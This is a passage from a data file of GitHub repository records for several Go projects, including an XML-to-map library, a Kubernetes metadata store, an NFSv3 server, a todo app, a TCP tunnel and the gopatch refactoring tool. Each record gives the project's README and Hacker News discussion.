\n\n\t2022.11.28: v2.7 - add SetGlobalKeyMapPrefix to change default prefix, '#', for default keys\n\t2022.11.20: v2.6 - add NewMapForattedXmlSeq for XML docs formatted with whitespace character\n\t2021.02.02: v2.5 - add XmlCheckIsValid toggle to force checking that the encoded XML is valid\n\t2020.12.14: v2.4 - add XMLEscapeCharsDecoder to preserve XML escaped characters in Map values\n\t2020.10.28: v2.3 - add TrimWhiteSpace option\n\t2020.05.01: v2.2 - optimize map to XML encoding for large XML docs.\n\t2019.07.04: v2.0 - remove unnecessary methods - mv.XmlWriterRaw, mv.XmlIndentWriterRaw - for Map and MapSeq.\n\t2019.07.04: Add MapSeq type and move associated functions and methods from Map to MapSeq.\n\t2019.01.21: DecodeSimpleValuesAsMap - decode to map[:map[\"#text\":]] rather than map[:]\n\t2018.04.18: mv.Xml/mv.XmlIndent encodes non-map[string]interface{} map values - map[string]string, map[int]uint, etc.\n\t2018.03.29: mv.Gob/NewMapGob support gob encoding/decoding of Maps.\n\t2018.03.26: Added mxj/x2j-wrapper sub-package for migrating from legacy x2j package.\n\t2017.02.22: LeafNode paths can use \".N\" syntax rather than \"[N]\" for list member indexing.\n\t2017.02.10: SetFieldSeparator changes field separator for args in UpdateValuesForPath, ValuesFor... methods.\n\t2017.02.06: Support XMPP stream processing - HandleXMPPStreamTag().\n\t2016.11.07: Preserve name space prefix syntax in XmlSeq parser - NewMapXmlSeq(), etc.\n\t2016.06.25: Support overriding default XML attribute prefix, \"-\", in Map keys - SetAttrPrefix().\n\t2016.05.26: Support customization of xml.Decoder by exposing CustomDecoder variable.\n\t2016.03.19: Escape invalid chars when encoding XML attribute and element values - XMLEscapeChars().\n\t2016.03.02: By default decoding XML with float64 and bool value casting will not cast \"NaN\", \"Inf\", and \"-Inf\".\n\t To cast them to float64, first set flag with CastNanInf(true).\n\t2016.02.22: New mv.Root(), mv.Elements(), mv.Attributes methods let you examine XML document structure.\n\t2016.02.16: Add CoerceKeysToLower() option to handle tags with mixed capitalization.\n\t2016.02.12: Seek for first xml.StartElement token; only return error if io.EOF is reached first (handles BOM).\n\t2015.12.02: XML decoding/encoding that preserves original structure of document. See NewMapXmlSeq()\n\t and mv.XmlSeq() / mv.XmlSeqIndent().\n\t2015-05-20: New: mv.StringIndentNoTypeInfo().\n\t Also, alphabetically sort map[string]interface{} values by key to prettify output for mv.Xml(),\n\t mv.XmlIndent(), mv.StringIndent(), mv.StringIndentNoTypeInfo().\n\t2014-11-09: IncludeTagSeqNum() adds \"_seq\" key with XML doc positional information.\n\t (NOTE: PreserveXmlList() is similar and will be here soon.)\n\t2014-09-18: inspired by NYTimes fork, added PrependAttrWithHyphen() to allow stripping hyphen from attribute tag.\n\t2014-08-02: AnyXml() and AnyXmlIndent() will try to marshal arbitrary values to XML.\n\t2014-04-28: ValuesForPath() and NewMap() now accept path with indexed array references.\n\n

Basic Unmarshal XML to map[string]interface{}

\n
type Map map[string]interface{}
\n\nCreate a `Map` value, 'mv', from any `map[string]interface{}` value, 'v':\n
mv := Map(v)
\n\nUnmarshal / marshal XML as a `Map` value, 'mv':\n
mv, err := NewMapXml(xmlValue) // unmarshal\nxmlValue, err := mv.Xml()      // marshal
\n\nUnmarshal XML from an `io.Reader` as a `Map` value, 'mv':\n
mv, err := NewMapXmlReader(xmlReader)         // repeated calls, as with an os.File Reader, will process stream\nmv, raw, err := NewMapXmlReaderRaw(xmlReader) // 'raw' is the raw XML that was decoded
\n\nMarshal `Map` value, 'mv', to an XML Writer (`io.Writer`):\n
err := mv.XmlWriter(xmlWriter)\nraw, err := mv.XmlWriterRaw(xmlWriter) // 'raw' is the raw XML that was written on xmlWriter
\n \nAlso, for prettified output:\n
xmlValue, err := mv.XmlIndent(prefix, indent, ...)\nerr := mv.XmlIndentWriter(xmlWriter, prefix, indent, ...)\nraw, err := mv.XmlIndentWriterRaw(xmlWriter, prefix, indent, ...)
\n\nBulk process XML with error handling (note: handlers must return a boolean value):\n
err := HandleXmlReader(xmlReader, mapHandler(Map), errHandler(error))\nerr := HandleXmlReaderRaw(xmlReader, mapHandler(Map, []byte), errHandler(error, []byte))
\n\nConverting XML to JSON: see Examples for `NewMapXml` and `HandleXmlReader`.\n\nThere are comparable functions and methods for JSON processing.\n\nArbitrary structure values can be decoded to / encoded from `Map` values:\n
mv, err := NewMapStruct(structVal)\nerr := mv.Struct(structPointer)
\n\n

Extract / modify Map values

\nTo work with XML tag values, JSON or Map key values or structure field values, decode the XML, JSON\nor structure to a `Map` value, 'mv', or cast a `map[string]interface{}` value to a `Map` value, 'mv', then:\n
paths := mv.PathsForKey(key)\npath := mv.PathForKeyShortest(key)\nvalues, err := mv.ValuesForKey(key, subkeys)\nvalues, err := mv.ValuesForPath(path, subkeys)\ncount, err := mv.UpdateValuesForPath(newVal, path, subkeys)
\n\nGet everything at once, irrespective of path depth:\n
leafnodes := mv.LeafNodes()\nleafvalues := mv.LeafValues()
\n\nA new `Map` with whatever keys are desired can be created from the current `Map` and then encoded in XML\nor JSON. (Note: keys can use dot-notation.)\n
newMap, err := mv.NewMap(\"oldKey_1:newKey_1\", \"oldKey_2:newKey_2\", ..., \"oldKey_N:newKey_N\")\nnewMap, err := mv.NewMap(\"oldKey1\", \"oldKey3\", \"oldKey5\") // a subset of 'mv'; see \"examples/partial.go\"\nnewXml, err := newMap.Xml()   // for example\nnewJson, err := newMap.Json() // ditto
\n\n

Usage

\n\nThe package is fairly well [self-documented with examples](http://godoc.org/github.com/clbanning/mxj).\n\nAlso, the subdirectory \"examples\" contains a wide range of examples, several taken from golang-nuts discussions.\n\n

XML parsing conventions

\n\nUsing NewMapXml()\n\n - Attributes are parsed to `map[string]interface{}` values by prefixing a hyphen, `-`,\n to the attribute label. (Unless overridden by `PrependAttrWithHyphen(false)` or\n `SetAttrPrefix()`.)\n - If the element is a simple element and has attributes, the element value\n is given the key `#text` for its `map[string]interface{}` representation. (See\n the 'atomFeedString.xml' test data, below.)\n - XML comments, directives, and process instructions are ignored.\n - If CoerceKeysToLower() has been called, then the resultant keys will be lower case.\n\nUsing NewMapXmlSeq()\n\n - Attributes are parsed to `map[\"#attr\"]map[]map[string]interface{}`values\n where the `` value has \"#text\" and \"#seq\" keys - the \"#text\" key holds the \n value for ``.\n - All elements, except for the root, have a \"#seq\" key.\n - Comments, directives, and process instructions are unmarshalled into the Map using the\n keys \"#comment\", \"#directive\", and \"#procinst\", respectively. (See documentation for more\n specifics.)\n - Name space syntax is preserved: \n - `something` parses to `map[\"ns:key\"]interface{}{\"something\"}`\n - `xmlns:ns=\"http://myns.com/ns\"` parses to `map[\"xmlns:ns\"]interface{}{\"http://myns.com/ns\"}`\n\nBoth\n\n - By default, \"Nan\", \"Inf\", and \"-Inf\" values are not cast to float64. If you want them\n to be cast, set a flag to cast them using CastNanInf(true).\n\n

XML encoding conventions

\n\n - 'nil' `Map` values, which may represent 'null' JSON values, are encoded as ``.\n NOTE: the operation is not symmetric as `` elements are decoded as `tag:\"\"` `Map` values,\n which, then, encode in JSON as `\"tag\":\"\"` values.\n - ALSO: there is no guarantee that the encoded XML doc will be the same as the decoded one. (Go\n randomizes the walk through map[string]interface{} values.) If you plan to re-encode the\n Map value to XML and want the same sequencing of elements look at NewMapXmlSeq() and\n mv.XmlSeq() - these try to preserve the element sequencing but with added complexity when\n working with the Map representation.\n\n

Running \"go test\"

\n\nBecause there are no guarantees on the sequence map elements are retrieved, the tests have been \nwritten for visual verification in most cases. One advantage is that you can easily use the \noutput from running \"go test\" as examples of calling the various functions and methods.\n\n

Motivation

\n\nI make extensive use of JSON for messaging and typically unmarshal the messages into\n`map[string]interface{}` values. This is easily done using `json.Unmarshal` from the\nstandard Go libraries. Unfortunately, many legacy solutions use structured\nXML messages; in those environments the applications would have to be refactored to\ninteroperate with my components.\n\nThe better solution is to just provide an alternative HTTP handler that receives\nXML messages and parses it into a `map[string]interface{}` value and then reuse\nall the JSON-based code. The Go `xml.Unmarshal()` function does not provide the same\noption of unmarshaling XML messages into `map[string]interface{}` values. So I wrote\na couple of small functions to fill this gap and released them as the x2j package.\n\nOver the next year and a half additional features were added, and the companion j2x\npackage was released to address XML encoding of arbitrary JSON and `map[string]interface{}`\nvalues. As part of a refactoring of our production system and looking at how we had been\nusing the x2j and j2x packages we found that we rarely performed direct XML-to-JSON or\nJSON-to_XML conversion and that working with the XML or JSON as `map[string]interface{}`\nvalues was the primary value. Thus, everything was refactored into the mxj package.\n\n", "readme_type": "markdown", "hn_comments": "Halfway through the post I concluded what you did at the end.I'm not sure if it's feasible given your current situation, but moving to another team will probably make you feel more engaged/fulfilled at work. You sound proactive and you care about doing a good job, a team where you're the only one with that attitude is only going to bring you down.You could switch teams or just go to another company.> I find myself cleaning up a lot of the messes these people make. I always was the first one attending to issues product owner found in their work and raise the concern in them because I don't want to see the team I am in fail because of anyone's inattention. I am not sure if I care too much but I know I certainly can't let my team fail even if I am not in the lead position.Why would they do their job, when it's easier to not do anything and let you do it for them?Perhaps you are taking it too seriously. Sometimes \"deadlines\" are not really deadlines. I once work on a team exactly like the one you described: I was the new one and I was coming from a company that was obsessed with delivery something every week (even if that means delivering crap features). My new team was slow (for my then standards), it would take two days for the senior engineers to open a pull request about\"adding a simple constant to an array\"... But I after a few months I got used to that pace because: 1) we were delivering almost no (serious) bugs (which means we were never being paged at 3am), 2) it was a very relaxed environment, where I wasn't stressed at all (not like in my previous company).What makes this specific to fintech vs. general ML tools? I led risk at a fintech and it\u2019s unclear how this is better than generalized solutions.Congratulations on launch! ML tools/services/platforms are really hard to build. You need to juggle not only frontend/backend frameworks but also make them work with ML frameworks. There are so many corner-cases that can make the whole app crash.How does it differ from open-source AutoML frameworks like https://github.com/mljar/mljar-supervised or drag-and-drop tools like Azure ML Studio?Is the no-writing the code a killer feature here?Do you have financial data enhancement feature? Do you plan such feature?Because financial data generally means time-series, autocorrelations abound, and it becomes very easy to develop a model that underperforms naive baselines (e.g. LOCF, arima) or peeks into the future through improper cross validation or feature engineering.If the customer gives you a column that peeks into the future (e.g. \"quarterly sales\" when each row is a sale in that quarter), you'll build a model that looks great on metrics and to the customer, and might take months for the customer to realize was practically useless. Are you able to reliably prevent these kinds of issues at a technical level, or do you lean towards customer education (\"don't give us quarterly sales\") instead?> We then used the error spotting tool on the Deepomatic platform to detect errors and to correct them.I'm wondering if those errors are selected on how much they impact the performance?Anyway, this is probably a much better way of gaining accuracy on the cheap than launching 100+ models for hyperparameter tuning.Best I can tell, they are using the ML model to detect the errors. Isn't this a bit of an ouroboros? The model will naturally get better, because you are only correcting problems where it was right but the label was wrong.It's not necessarily a representation of a better model, but just of a better testing set.20% annotation error is huge, especially since those datasets (COCO, VOC) are used for basically every benchmark and state of the art research.Why aren't these data sets editable instead of static? Treat them like a collaborative wiki or something (OpenStreetMap being the closest fit) and allow everyone to submit improvements so that all may benefit.I hope the people in this article had a way to contribute back their improvements, and did so.Gringo Marketing Article Spinner is constructed to offer the very best spinning tools with the greatest worth for all users and all languages. We know that premium article is crusial for every single people and company to meet their target marketing needs and requirements. We understand what is needed to supply advanced, yet user friendly software application to provide users the capability to make content quick create the short articles they need with no high costs or complicated settings. Visit https://gringomarketing.com/article-rewriterUsing simple techniques, they found out that popular open source datasets like VOC or COCO contain up to 20% annotation errors in. By manually correcting those errors, they got an average error reduction of 5% for state-of-the-art computer vision models.An idea on how this could work: repeatedly re-split the dataset (to cover all of it), and re-train a detector on the splits, then at the end of each training cycle surface validation frames with the highest computed loss (or some other metric more directly derived from bounding boxes, such as the number of high confidence \"false\" positives which could be instances of under-labeling) at the end of training. That's what I do on noisy, non-academic datasets, anyway.Weird behaviour on pinch to zoom (macbook). It scrolls instead of zooming and when swiping back nothing happens.Another example of why you should never mess with the defaults unless strictly necessary.Nothing is however said about how the errors are detected. Can an ML expert chime in?These things are why I stopped doing computer vision after my master thesisThe title here seems wrong. Suggested change:\"Cleaning algorithm finds 20% of errors in major image recognition datasets\" -> \"Cleaning algorithm finds errors in 20% of annotations in major image recognitions.\"We don't know if the found errors represent 20%, 90% or 2% of the total errors in the dataset.> Create an account on the Deepomatic platform with the voucher code \u201cSPOT ERRORS\u201d to visualize the detected errors.Nice ad.Talk to Dave at https://resumeraiders.com/ I had him help with my resume and linkedin profile and recommend his work.As smt88 says in the comments:\n> You can't. If you value the relationship, don't do this.While I agree that there is never a water-tight way to protect personal relationships, it is possible to retain them in a business scenario. But I would advise against it.I have for many years now had a company with my best friend. We lived together for a long time, and let me tell you \u2014 you start to lose the quirks and the 'niceties' of an established personal relationship very very fast unless you are able to separate work and life, and create boundaries to do so. It seems like you and your wife currently have a separate home life from your other business partners, so this is a good step.One of the reasons why my and my friend's company works so well is that we have a strict 50/50 split on equity and pay. This means sometimes one contributes more than the other. Yes, this can create feelings of resentment \u2014 and unless you are 100% open about your feelings with each other, and are close enough to remedy it, these feelings can harbor and grow and ultimately ruin the relationship. Business (especially when starting one) is unpredictable. That is an understatement. I would argue that splitting equity differently than equally has more potential to go wrong because roles are often redefined on the fly and you cannot foresee with certainty how much work each person will have on their plate.I feel like my 'success' at doing at what you are hoping to achieve is an outlier. Indeed, we have also both worked with other family members and this has somewhat soured relations. Very rarely does business make a pre-existing personal relationship stronger. It adds more potential points of contention. Things never go swimmingly; and the best you can hope for is a solid outcome with bumps along the way. You must ask yourself if you are capable of handling these bumps as a group.You must also ask yourself if you are willing to lose your relationship (as it is). This is a very real risk, and has happened to people I know (myself included).I wish you the best, but also cannot strain enough how important it is to value personal relationships.Set all your expectations up front and explicitly as possible. That can be more awkward with family than colleagues but it's also more important. Resentment occurs when someone thinks they're doing more or getting less than they bargained for.You can't. If you value the relationship, don't do this.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kubewharf/kubebrain", "link": "https://github.com/kubewharf/kubebrain", "tags": ["kubernetes", "etcd", "metadata", "scalability", "kv-store"], "stars": 543, "description": "A High Performance Metadata System for Kubernetes", "lang": "Go", "repo_lang": "", "readme": "#KubeBrain\n\n[English](README.md) | Chinese\n\nThe distributed application orchestration and scheduling system kubernetes has become the de facto standard for cloud-native application bases, but its official stable operation scale is limited to only 5K nodes; this is sufficient for most application scenarios, but for millions of machine nodes The application scenarios are still not enough in scale. Especially with the development of \"digitalization\" and \"cloud nativeization\", the overall scale of global IT infrastructure will continue to grow at an accelerated rate. For distributed application scheduling systems, there are two ways to adapt to this trend:\n\n- **horizontal expansion** to build the ability to manage N clusters\n- **Vertical expansion** to increase the size of a single cluster\n\nTo expand the scale of a single cluster, the storage of meta information/state information is one of the core extension points. This project is to solve the scalability and performance problems of cluster state information storage.\n\nWe investigated some existing distributed storage systems, and also analyzed the performance bottleneck of ETCD and the interface requirements of kubernetes for state information storage. Inspired by the [kine project](https://github.com/k3s-io/kine), KubeBrain was implemented as the core service of Kubernetes state information storage.\n\n# Project Features\n\n- **no status**\n As a component that implements the storage server interface required by the API Server, KubeBrain converts the storage interface and does not actually store data. The actual metadata is stored in the underlying storage engine, and the data that the API Server needs to monitor is stored in the master node. in memory.\n- **Scalability**\n KubeBrain abstracts the key-value database interface, and on this basis implements the interface required for storage API Server storage. Key-value databases with specified characteristics can be adapted to the storage interface.\n- **High Availability**\n KubeBrain currently adopts a master-slave architecture. The master node supports all operations including conditional update, read, and event monitoring, and the slave node supports read operations. Based on K8S [leaderelection](https://github.com/kubernetes/client-go/ tree/master/tools/leaderelection)\n Automatic master selection to achieve high availability.\n- **Horizontal Expansion**\n In a production environment, KubeBrain usually uses a distributed key-value database to store data, and horizontal expansion includes two levels:\n - At the KubeBrain level, the concurrent read performance can be improved by adding slave nodes;\n - At the storage engine level, read and write performance and storage capacity can be improved by adding storage nodes and other means.\n\n# Detailed documentation\n\n- [Quick Start](./docs/quick_start_en.md)\n- [Architecture Design](./docs/design_in_detail_cn.md)\n- [Storage Engine](./docs/storage_engine_en.md)\n- [Performance Test](./docs/benchmark_cn.md)\n\n# TODO\n\n- [ ] Optimize storage engine interface\n- [ ] Consistency guarantees in extreme cases\n- [ ] Built-in logic clock\n- [ ] Optimize unit test code, increase use cases and error injection\n- [ ] [Jepsen Test](https://jepsen.io/)\n- [ ] Realize the Proxy function\n\n# Contributing code\n\n[Contributing](CONTRIBUTING.md)\n\n# contact us\n\n- Email: kubewharf.conduct@bytedance.com\n- Member: Please see [Maintainers](./MAINTAINER.md)\n\n# open source license\n\nKubeBrain is based on the [Apache License 2.0] (LICENSE) license.", "readme_type": "markdown", "hn_comments": "What kind of backend storage does KubeBrain use?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "willscott/go-nfs", "link": "https://github.com/willscott/go-nfs", "tags": ["nfsv3", "golang", "nfs", "nfs-server", "billy", "hacktoberfest"], "stars": 542, "description": "golang NFSv3 server", "lang": "Go", "repo_lang": "", "readme": "Golang Network File Server\n===\n\nNFSv3 protocol implementation in pure Golang.\n\nCurrent Status:\n* Minimally tested\n* Mounts, read-only and read-write support\n\nUsage\n===\n\nThe most interesting demo is currently in `example/osview`. \n\nStart the server\n`go run ./example/osview .`.\n\nThe local folder at `.` will be the initial view in the mount. mutations to metadata or contents\nwill be stored purely in memory and not written back to the OS. When run, this\ndemo will print the port it is listening on.\n\nThe mount can be accessed using a command similar to \n`mount -o port=,mountport= -t nfs localhost:/mount ` (For Mac users)\n\nor\n\n`mount -o port=,mountport=,nfsvers=3,noacl,tcp -t nfs localhost:/mount ` (For Linux users)\n\nAPI\n===\n\nThe NFS server runs on a `net.Listener` to export a file system to NFS clients.\nUsage is structured similarly to many other golang network servers.\n\n```golang\npackage main\n\nimport (\n\t\"fmt\"\n\t\"log\"\n\t\"net\"\n\n\t\"github.com/go-git/go-billy/v5/memfs\"\n\tnfs \"github.com/willscott/go-nfs\"\n\tnfshelper \"github.com/willscott/go-nfs/helpers\"\n)\n\nfunc main() {\n\tlistener, err := net.Listen(\"tcp\", \":0\")\n\tpanicOnErr(err, \"starting TCP listener\")\n\tfmt.Printf(\"Server running at %s\\n\", listener.Addr())\n\tmem := memfs.New()\n\tf, err := mem.Create(\"hello.txt\")\n\tpanicOnErr(err, \"creating file\")\n\t_, err = f.Write([]byte(\"hello world\"))\n\tpanicOnErr(err, \"writing data\")\n\tf.Close()\n\thandler := nfshelper.NewNullAuthHandler(mem)\n\tcacheHelper := nfshelper.NewCachingHandler(handler, 1)\n\tpanicOnErr(nfs.Serve(listener, cacheHelper), \"serving nfs\")\n}\n\nfunc panicOnErr(err error, desc ...interface{}) {\n\tif err == nil {\n\t\treturn\n\t}\n\tlog.Println(desc...)\n\tlog.Panicln(err)\n}\n```\n\nNotes\n---\n\n* Ports are typically determined through portmap. The need for running portmap \n(which is the only part that needs a privileged listening port) can be avoided\nthrough specific mount options. e.g. \n`mount -o port=n,mountport=n -t nfs host:/mount /localmount`\n\n* This server currently uses [billy](https://github.com/go-git/go-billy/) to\nprovide a file system abstraction layer. There are some edges of the NFS protocol\nwhich do not translate to this abstraction.\n * NFS expects access to an `inode` or equivalent unique identifier to reference\n files in a file system. These are considered opaque identifiers here, which\n means they will not work as expected in cases of hard linking.\n * The billy abstraction layer does not extend to exposing `uid` and `gid`\n ownership of files. If ownership is important to your file system, you\n will need to ensure that the `os.FileInfo` meets additional constraints.\n In particular, the `Sys()` escape hatch is queried by this library, and\n if your file system populates a [`syscall.Stat_t`](https://golang.org/pkg/syscall/#Stat_t)\n concrete struct, the ownership specified in that object will be used.\n\n* Relevant RFCS:\n[5531 - RPC protocol](https://tools.ietf.org/html/rfc5531),\n[1813 - NFSv3](https://tools.ietf.org/html/rfc1813),\n[1094 - NFS](https://tools.ietf.org/html/rfc1094)\n", "readme_type": "markdown", "hn_comments": "Good work !\nPS is NFS still a thing ? I thought Gluster(FS) or S3 sorta replaced it in most shops ? I could be mistaken of course.@willscott: Do you have any experience to share running this over Wireguard or similar?Edit: Thank you!Considering how many things have been implemented on top of HTTP, I find it interesting that something like WebDAV (or Solid[0], or remoteStorage[1]) hasn't nearly completely supplanted NFS/SFTP/etc.Not saying that would be ideal from a technical perspective (WebDAV at least has some issues), just surprised the ability to access remote filesystems from the browser hasn't been a bigger driver.For example, there are a lot of interesting apps built on top of Google Drive as the storage backend, but overall the concept doesn't seem to have gained much traction.[0]: https://inrupt.com/solid[1]: https://remotestorage.io/I've always wondered if I could take the Unix \"everything is a file\" approach way too far and hook it up to a web service. This looks like exactly the kind of glue to make that easy...This is cool! At a previous company we got a lot of mileage in debugging and ad-hoc tasks by exposing various things as filesystems. We mostly did webdav, but NFS is way better from a client transparency perspective. For many folks find, ls, and grep very much beat curl and jq.Didn't see it mentioned in the README, so I'll ask here: any particular reason to go NFSv3 vs NFSv4? I'm not familiar enough with the protocol to venture an educated guess.I wonder if this is a good way to support projects like Microsoft's Git VFS without requiring specific kernel drivers. Mounting a special Git NFS drive + having all the magic hidden behind NFS seems like it could be interesting.Possibly useful existing implementation:https://github.com/unfs3/unfs3This has the benefits of being tested and having a working read-write implementation (along with still being user-space).When looking for something like this a year or so ago, I found [1] which supports both NFSv3 and v4 as well as p9. It worked alright in my experience though I eventually switched to ZFS which has built in support to auto-configure NFS shares.[1]: https://github.com/nfs-ganesha/nfs-ganeshaWasn't expecting to see this here!This turned out easier than i was expecting it to be. It's nice to be able to mount a VFS without needing privileges on the server side.\nThe main intention for this code is to eventually use it to replace fuse on mac, since nfs is a valid mount time for mac clients to consume.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "thewhitetulip/Tasks", "link": "https://github.com/thewhitetulip/Tasks", "tags": ["webapp", "golang", "todo", "task-tracker"], "stars": 542, "description": "A simplistic todo list manager written in Go", "lang": "Go", "repo_lang": "", "readme": "# Tasks\n\nTasks is a simplistic Go webapp to manage tasks, I built this tool to manage tasks which I wanted to do, there are many good kanban style boards, but I felt they were a bit too heavyweight for my taste. Also I wanted to learn the Go webapp development.\n\nHow to use?\n==================\nVia script: `bash install.sh`\n\nThis will generate the binary and set up the database. If you want, you can copy the binary and the public folder into a folder of your choice.\n\nManually:\n\n1. `go get github.com/thewhitetulip/Tasks`\n1. change dir to the respective folder and create the db file: `cat schema.sql | sqlite3 tasks.db`\n1. run `go build`\n1. `./Tasks`\n1. open [localhost:8081](http://localhost:8081)\n\nYou can change the port in the [config](https://github.com/thewhitetulip/Tasks/blob/master/config.json) file\n\n## Features\n\n1. Add, update, delete task.\n2. Search tasks, the query is highlighted in the search results page.\n3. Github flavoured markdown, which enables us for using a task list, advanced syntax highlighting and much more.\n4. Supports file upload, randomizes the file name, stores the user given filename in a db and works on the randomized file name for security reasons.\n5. Priorities are assigned, High = 3, medium = 2 and low = 1, sorting is done on priority descending and created date ascending.\n6. Categories are supported, you can add tasks to different categories. \n1. Ability to hide a task from the timeline.\n1. For a task list, shows 6 out of 8 tasks completed.\n1. Single click install, just run the install.sh file.\n\n\n##### Book\nI am learning writing webapps with Go as I build this application, I took to writing an introductory book about [building webapps in Go](https://github.com/thewhitetulip/web-dev-golang-anti-textbook) because I faced a lot of problems while learning how to write webapps in Go, it, the book strives to teach by practical examples. You are welcome to contribute to the book.\n\n# Screenshots\nThe Home Page\n\n![Home Page](https://github.com/thewhitetulip/Tasks/blob/master/screenshots/FrontEnd.png)\n\nAdd Task dialog\n\n![Add Task](https://github.com/thewhitetulip/Tasks/blob/master/screenshots/FrontEnd-Add%20task.png)\n\nNavigation drawer\n\n![Navigation Drawer](https://github.com/thewhitetulip/Tasks/blob/master/screenshots/FrontEnd%20Navigation%20Drawer.png)\n\n# License\n\nThe MIT License (MIT)\n\nCopyright (c) 2015 Suraj Patil\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n", "readme_type": "markdown", "hn_comments": "I wish we would write Go apps following that lovely pattern, but without opening a DOS box, ie like a Windows app.I'd love feedback about the appThis looks good - nice and simple and self hosted, could you add support for multiple lists? That'd be awesome.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "xjdrew/gotunnel", "link": "https://github.com/xjdrew/gotunnel", "tags": [], "stars": 542, "description": "tcp tunnel", "lang": "Go", "repo_lang": "", "readme": "[![Build Status](https://travis-ci.org/xjdrew/gotunnel.svg?branch=master)](https://travis-ci.org/xjdrew/gotunnel)\n\n## gotunnel\ngotunnel is a secure tcp tunnel software. It can use tcp or udp connectioin as low level tunnel.\n\ngotunnel could be added to any c/s system using tcp protocol. Make system structure evolve from\n```\nclient <--------------> server\n```\nto\n```\nclient <-> gotunnel <--------------> gotunnel <-> server\n```\nto gain gotunnel's valuable features, such as secure and persistent. \n\n## build\n\n```bash\ngo install github.com/xjdrew/gotunnel\n```\n\n\n## Usage\n\n```\nusage: bin/gotunnel\n -backend string\n backend address (default \"127.0.0.1:1234\")\n -listen string\n listen address (default \":8001\")\n -log uint\n log level (default 1)\n -secret string\n tunnel secret (default \"the answer to life, the universe and everything\")\n -timeout int\n tunnel read/write timeout (default 3)\n -tunnels uint\n low level tunnel count, 0 if work as server\n```\n\nsome options:\n* secret: for authentication and exchanging encryption key\n* tunnels: 0 means gotunnel will and as server; Any value larger than 0 means gotunnel will work as client, and build *tunnels* tcp connections to server.\n* timeout: if can't read a packet body in *timeout* seconds, will recreate this tunnel. It's useful if theres is a critical firewall between gotunnel client and server.\n\n\n## Example\nSuppose you have a squid server, and you use it as a http proxy. Usually, you will start the server:\n```\n$ squid3 -a 8080\n```\nand use it on your pc:\n```\ncurl --proxy server:8080 http://example.com\n```\nIt works fine but all traffic between your server and pc is plaintext, so someone can monitor you easily. In this case, gotunnel could help to encrypt your traffic.\n\nFirst, on your server, resart squid to listen on a local port, for example **127.0.0.1:3128**. Then start gotunnel server listen on 8080 and use **127.0.0.1:3128** as backend.\n```\n$ ./gotunnel -listen=:8001 -backend=127.0.0.1:3128 -secret=\"your secret\" -log=10 \n```\nSecond, on your pc, start gotunnel client:\n```\n$ ./gotunnel -tunnels=100 -listen=\"127.0.0.1:8080\" -backend=\"server:8001\" -secret=\"your secret\" -log=10 \n```\n\nThen you can use squid3 on you local port as before, but all your traffic is encrypted. \n\nBesides that, you don't need to create and destory tcp connection between your pc and server, because gotunnel use long-live tcp connections as low tunnel. In most cases, it would be faster.\n\n## licence\nThe MIT License (MIT)\n\nCopyright (c) 2015 xjdrew\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "uber-go/gopatch", "link": "https://github.com/uber-go/gopatch", "tags": ["golang", "refactoring", "go"], "stars": 542, "description": "Refactoring and code transformation tool for Go.", "lang": "Go", "repo_lang": "", "readme": "# gopatch [![Go](https://github.com/uber-go/gopatch/actions/workflows/go.yml/badge.svg)](https://github.com/uber-go/gopatch/actions/workflows/go.yml) [![codecov](https://codecov.io/gh/uber-go/gopatch/branch/main/graph/badge.svg?token=tFsx23GSTB)](https://codecov.io/gh/uber-go/gopatch)\n\ngopatch is a tool to match and transform Go code. It is meant to aid in\nrefactoring and restyling.\n\n# Table of contents\n\n- [Introduction](#introduction)\n- [Getting started](#getting-started)\n - [Installation](#installation)\n - [Your first patch](#your-first-patch)\n - [Apply the patch](#apply-the-patch)\n - [Next steps](#next-steps)\n- [Usage](#usage)\n - [Options](#options)\n- [Patches](#patches)\n - [Metavariables](#metavariables)\n - [Statements](#statements)\n - [Elision](#elision)\n - [Comments](#comments)\n - [Description comments](#description-comments)\n - [Usage in diff mode](#usage-during-diff-mode)\n- [Examples](#examples)\n- [Project status](#project-status)\n - [Goals](#goals)\n - [Known issues](#known-issues)\n - [Upcoming](#upcoming)\n- [Similar Projects](#similar-projects)\n- [Credits](#credits)\n\n# Introduction\n\ngopatch operates like the Unix `patch` tool: given a patch file and another\nfile as input, it applies the changes specified in the patch to the provided\nfile.\n\n```\n .-------. .-------.\n/_| |. /_| |.\n| ||. +---------+ | ||.\n| .go |||>-->| gopatch |>-->| .go |||\n| ||| +---------+ | |||\n'--------'|| ^ '--------'||\n '--------'| | '--------'|\n '--------' | '--------'\n .-------. |\n /_| | |\n | +----'\n | .patch |\n | |\n '--------'\n```\n\nWhat specifically differentiates it from `patch` is that unlike plain text\ntransformations, it can be smarter because it understands Go syntax.\n\n# Getting started\n\n## Installation\n\nDownload a **pre-built binary** of gopatch from the [Releases page] or by\nrunning the following command in your terminal and place it on your `$PATH`.\n\n [Releases page]: https://github.com/uber-go/gopatch/releases\n\n```bash\nVERSION=0.1.1\nURL=\"https://github.com/uber-go/gopatch/releases/download/v$VERSION/gopatch_${VERSION}_$(uname -s)_$(uname -m).tar.gz\"\ncurl -L \"$URL\" | tar xzv gopatch\n```\n\nAlternatively, if you have Go installed, **build it from source** and install\nit with the following command.\n\n```bash\ngo install github.com/uber-go/gopatch@latest\n```\nNote: If 